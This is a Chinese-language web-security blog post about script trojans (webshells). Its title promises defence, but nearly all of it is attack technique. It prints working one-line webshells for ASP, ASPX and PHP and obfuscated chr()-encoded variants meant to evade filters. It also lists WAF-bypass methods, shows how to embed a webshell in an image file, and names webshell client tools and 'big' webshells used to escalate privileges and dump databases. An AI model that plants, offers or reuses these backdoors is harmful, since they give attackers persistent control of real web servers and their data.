web安全中腳本木馬如何防御

這篇文章給大家分享的是有關web安全中腳本木馬如何防御的內容。小編覺得挺實用的，因此分享給大家做個參考，一起跟隨小編過來看看吧。

腳本木馬的制作原理

webshell就是一種網頁后門(web后門)

webshell制作原理
webshell使用技巧
webshell"黑吃黑"

一. webshell制作原理

一句話木馬(2010年出來)--> 上傳大馬進行提權
小馬                --> 上傳大馬進行提權
大馬
打包馬
脫褲馬
執行命令馬

GetShell就是拿webshell的動作

1. 一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用

asp : 
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"

aspx : 
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>

PHP : 
<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注冊信息的電子郵箱或個人主頁等中插入類似如下代碼:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是獲取這個值

上述代碼現在比較多見,而且字符數少,對表單字數有限制的地方特別的實用

當知道了數據庫的URL,就可以利用本地一張網頁進行連接得到WebShell(不知道數據庫也可以,只要知道一句話木馬的文件被插入到那一個ASP文件里面就可以了)

一句話木馬是基于B/S結構的

3. 一句話木馬變形

<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"

<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上會檢查腳本中的雙引號""",單引號"'"

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>

<% a=%request("gold") %><%eval %a%>

4. 一般WAF繞過方式

函數繞過
編碼繞過
可變變量繞過
動態獲取參數繞過

5. 一句話圖片馬的制作

C32下做一句話
打開c32, 把圖片放里面,寫入一句話保存,退出

cmd下做一句話
copy /b 1.jpg+1.asp 2.jpg

win7下右鍵圖片,在屬性 -> 詳細信息 -> 版權內插入一句話即可

6. 常見的一句話客戶端

中國菜刀
中國砍刀
蟻劍
C刀
lanker一句話客戶端
ZV新型PHP一句話木馬客戶端GUI版
一句話客戶端增強版

7. 大馬

大馬體積比較大,一般50kb以上.功能也多,一般都包含提權命令,磁盤管理,數據庫連接接口,執行命令甚至有些以具備自帶提權功能和壓縮,解壓縮網站程序的功能.這種馬隱蔽性不好,而大多代碼如不加密的話很多殺毒廠商開始追殺此類程序 .

用途 : 
提權
打包
脫褲
增刪文件

8. 小馬

作用主要用戶上傳大馬

二. webshell使用技巧

內容編碼
配合解析漏洞
配合文件包含
利用文件名溢出

三. webshell"黑吃黑"

http://xss.fbisb.com/xss.php?do=login

1. 找shell后門

查找后門
查找webshell后門
找到后門地址
反搞wehshell箱子

2. 找一句話客戶端后門

查找客戶端后門
找到后門地址
反搞wehshell箱子

感謝各位的閱讀！關于“web安全中腳本木馬如何防御”這篇文章就分享到這里了，希望以上內容可以對大家有一定的幫助，讓大家可以學到更多知識，如果覺得文章不錯，可以把它分享出去讓更多的人看到吧！